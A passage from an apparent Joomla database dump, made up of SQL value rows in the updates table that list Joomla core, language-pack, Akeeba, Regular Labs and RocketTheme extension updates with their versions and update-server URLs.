Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(12261,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(12262,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(12263,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(12264,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(12265,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(12266,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(12267,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(12268,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(12269,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(12270,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(12271,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(12272,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(12273,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(12274,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(12275,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(12276,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(12277,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12278,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-10.html\n				',''),(12279,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(12280,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-1.html\n				',''),(12282,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12283,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(12284,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(12285,3,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(12286,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(12287,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(12288,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(12289,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(12290,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(12291,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(12292,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(12293,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(12294,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(12295,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(12296,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(12297,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(12298,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(12299,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(12300,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(12301,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(12302,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(12303,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(12304,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(12305,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(12306,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(12307,3,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(12308,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(12309,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(12310,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(12311,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(12312,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(12313,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(12314,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(12315,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(12316,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(12317,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(12318,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(12319,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(12320,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(12321,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(12322,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(12323,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(12324,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(12325,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(12326,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(12327,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(12328,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(12329,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(12330,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(12331,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(12332,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(12333,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(12334,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(12335,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(12336,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(12337,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(12338,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(12339,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(12340,57,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(12341,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(12342,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(12343,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(12344,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(12345,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(12346,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(12347,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(12348,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(12349,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(12350,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(12351,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(12352,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(12353,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(12354,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(12355,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(12356,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(12357,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(12358,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(12359,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(12360,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(12361,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(12362,57,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(12363,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(12364,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(12365,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(12366,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(12367,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(12368,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(12369,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(12370,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(12371,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(12372,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(12373,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(12374,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(12375,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(12376,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(12377,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(12378,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(12379,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(12380,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(12381,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(12382,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(12383,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(12384,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(12385,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(12386,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12387,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-10.html\n				',''),(12388,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(12389,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-1.html\n				',''),(12390,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12391,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12392,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12393,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12394,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12395,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12396,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12397,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(12398,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(12399,3,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(12400,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(12401,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(12402,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(12403,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(12404,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(12405,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(12406,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(12407,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(12408,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(12409,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(12410,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(12411,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(12412,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(12413,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(12414,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(12415,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(12416,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(12417,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(12418,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(12419,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(12420,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(12421,3,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(12422,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(12423,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(12424,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(12425,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(12426,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(12427,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(12428,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(12429,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(12430,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(12431,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(12432,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(12433,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(12434,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(12435,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(12436,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(12437,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(12438,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(12439,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(12440,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(12441,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(12442,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(12443,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(12444,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(12445,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(12446,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(12447,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(12448,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(12449,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(12450,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(12451,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(12452,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(12453,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(12454,57,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(12455,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(12456,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(12457,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(12458,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(12459,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(12460,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(12461,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(12462,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(12463,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(12464,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(12465,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(12466,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(12467,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(12468,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(12469,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(12470,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(12471,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(12472,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(12473,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(12474,57,0,'English 